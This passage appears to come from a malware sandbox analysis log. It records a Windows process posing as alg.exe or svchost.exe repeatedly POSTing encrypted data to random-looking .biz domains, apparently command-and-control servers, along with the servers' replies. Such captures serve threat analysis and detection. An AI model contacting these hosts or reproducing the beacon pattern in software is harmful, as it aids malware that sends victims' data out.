                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965061903 CEST786OUTData Raw: 9b 88 a2 e4 e3 47 e7 d2 06 03 00 00 7e 8f e3 9d 9b 36 de 7d ac 81 ad 4a 28 fe c4 56 7e f1 bf b8 45 0a c4 cb b4 21 63 76 15 32 8e 37 83 d7 3a 88 81 91 da 70 5e 24 c7 c4 96 1f 89 aa e4 d4 5d 4a df 45 fb dc b1 c2 28 0f c9 40 ea 42 a5 03 32 d7 32 f2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: G~6}J(V~E!cv27:p^$]JE(@B22kAUuZPaX(9))?_gMofD7LP^dV\g!7q3W~\>.H q.DN{wc.31m_)R-Zx)
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.307182074 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4a0b43c6b2db1690d772a1fe3102a31f|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              64192.168.2.449954208.100.26.245802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080276012 CEST356OUTPOST /gdfpfuufvopwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080290079 CEST778OUTData Raw: 0a 8d 55 77 50 f4 ae fe fe 02 00 00 47 5c f5 37 24 e7 a1 47 11 c1 8d 4a ff f5 de 15 c1 e8 b0 09 1f 7e 1c 9a 12 25 c5 c1 8c a4 af 0f a1 5e cd e3 3f 7f da bb a0 7b 58 0f 15 4c 56 2d 76 02 69 0c 0f 38 63 5b aa 68 f5 0c 61 3d de 2b 6c c0 8c a7 7b f9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: UwPG\7$GJ~%^?{XLV-vi8c[ha=+l{/`cj/y<UE7'uJ-n'%5\0f+o((:I/S]RWO`:, FAj*&OqM%I#|F8#F{UA5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.585763931 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645131111 CEST344OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645941973 CEST778OUTData Raw: 80 11 22 d5 77 15 9c 0f fe 02 00 00 9d 2c 70 ed de 34 7a 7f ec ce 51 76 bc 4d b9 f6 47 78 48 1e 24 b6 a9 92 7f cd 84 a8 14 39 84 f5 be ab bd 5c 28 e8 92 96 07 69 cf df 46 dc 26 b6 b3 62 f6 f3 11 fe 9d a7 e7 c3 a7 6b 90 13 a7 ca ae 91 3f 0a 24 75
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "w,p4zQvMGxH$9\(iF&bk?$ux[Y:D/FoWi-".<M9+pfAPtC~E|}'mnP]+M)T@]:&K+*pGRqj6w!'r-]]sXyUm
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.824840069 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              65192.168.2.44996334.211.97.45802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST351OUTPOST /qgorjabxoa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST778OUTData Raw: a7 c0 c7 67 59 41 c3 40 fe 02 00 00 76 d9 05 81 65 9a d1 46 c5 8b cb b2 c0 ca fe 5c 49 2b 95 20 88 ee a4 c1 dc ef e5 c9 4d 96 a5 06 e9 ac 03 48 08 cb e3 f7 47 98 53 c5 f5 c2 72 a5 fc 76 80 9d f9 13 52 9d 56 e8 5b 9c 89 b2 af 05 e5 4a db 73 a6 ce
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gYA@veF\I+ MHGSrvRV[Jsiw-zY(OVtQ!Y(uUP\58p^5-tI+/k;p/I*.#~J,Tv!JLoO"jK(\fAPPvJy3Bf9b!
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.820430040 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f24aa81d462a605e1c94f38aafa2ab27|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              66192.168.2.44996644.213.104.86804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467190981 CEST342OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467216015 CEST786OUTData Raw: 90 06 03 62 f0 36 c1 75 06 03 00 00 a3 a0 19 56 f5 8f a2 f8 8d 1f 65 da b0 f7 4c 27 f1 72 e1 83 75 d8 2d 96 67 a4 ca 28 a6 f5 5d 63 2e 02 1e a8 91 be 5b 6f 11 be 5b 54 2c 67 72 00 48 d2 30 71 bb 45 b7 79 ec a9 66 ac 64 39 80 b4 0d 47 36 eb 83 75
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b6uVeL'ru-g(]c.[o[T,grH0qEyfd9G6u$94$/4e!,&&bauG0ol/=lqbZvjq9;p-D-[*dY+WtsY/UupOi&06BRk%R"HFm>c
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.944323063 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=456620071439b6a58b7b253e37a11edf|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              67192.168.2.44997118.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.134105921 CEST348OUTPOST /weir HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.134129047 CEST786OUTData Raw: 7a 56 2c dc e9 5a 6e 6d 06 03 00 00 08 16 3f ee 62 bf 9f 47 a0 fc 41 e7 dc fe db 52 a9 67 24 62 d5 cd c3 b0 a8 4e e4 b1 d5 8b e2 63 9b 4f f8 9b 55 5d a2 a6 eb 8c 54 56 de d8 3f f5 0d 73 13 4d d9 57 da 2f 87 64 bd 60 65 7a 1c a8 3d b7 bc cd 04 49
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zV,Znm?bGARg$bNcOU]TV?sMW/d`ez=IX2_28@(SJK_K<d+3aE@{^OBfmHp+9;O^iT%a5&>tpg$g\d7v!=Fw}E
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.598387003 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=956451c7933885173716a254994b0d1d|8.46.123.33|1728394141|1728394141|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              68192.168.2.44997354.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.191152096 CEST346OUTPOST /xg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.191293955 CEST778OUTData Raw: b3 06 0d 62 d0 32 3a 08 fe 02 00 00 2c 8a 72 74 38 7f b7 85 7a 62 34 dd 5c 8b da ab 54 ea 55 0f bb 88 f3 ab b2 63 b9 e5 8f 11 11 26 e4 8f 54 41 86 4b 8e c1 f4 c8 1c d4 bb 64 99 7c 54 16 f9 de 13 c4 71 fc 0a 9e 82 5f 75 4e 99 27 49 e4 06 43 cd 7a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b2:,rt8zb4\TUc&TAKd|Tq_uN'ICzl~|_#F<tc5`z$T%RD8sMqjd"Gm;~x`/GtRdo~Y&dLN-EtIn$J=G?M>z~k
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945708990 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=24a4bc582dd585a017921bee411f83e5|8.46.123.33|1728394141|1728394141|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              69192.168.2.44997913.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.946935892 CEST346OUTPOST /hrvg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.946935892 CEST786OUTData Raw: 2b 6a fa ce 78 f9 29 ef 06 03 00 00 44 ae d0 42 b2 28 bc 0c 0a 5e 09 cf 42 bc 8a da 56 1c 8e c2 ac c0 c0 35 e1 55 eb d5 1c fe f2 c8 95 02 d0 0a c7 9c f2 bf fa 82 a6 fb 3d e9 d0 e2 34 75 1e a9 24 14 13 40 86 72 d2 0a e8 87 66 ca b8 18 7d 55 83 d7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +jx)DB(^BV5U=4u$@rf}U$WbTf$@5&%n2$mBrlbE,YLi=_TZ!%]xYY{'zhBuVSE^`O,vsI/"H,<;UZ$
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.323447943 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=603bde0d86f7ada9dda25acf3810d075|8.46.123.33|1728394143|1728394143|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              70192.168.2.44998518.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534840107 CEST345OUTPOST /bc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534946918 CEST778OUTData Raw: 88 20 8e 92 cc c2 9f b8 fe 02 00 00 40 a7 32 16 e9 e1 cc 04 1f 0b de c4 14 0e f1 42 8b f9 99 bf 2e 90 e9 0d 15 cf 3c 8b 26 53 39 01 cf b2 c4 ae ce f0 cd 12 2a f9 96 fc bd 92 b3 97 dc 2c fa 61 67 b0 89 b6 af 8b ba 17 71 f4 3e 87 cd 15 b5 c8 03 b7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @2B.<&S9*,agq>y;,Da4!c~*g_rcEYsQ9D*r@6XI9i4YUA?#$m#{KTYGh?6u59&K'NS[`rI3/
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.884291887 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=71aed14bf4c180b5ea4264bcbcc44b0c|8.46.123.33|1728394143|1728394143|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              71192.168.2.44999313.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858597994 CEST356OUTPOST /hqdytjqsnbt HTTP/1.1
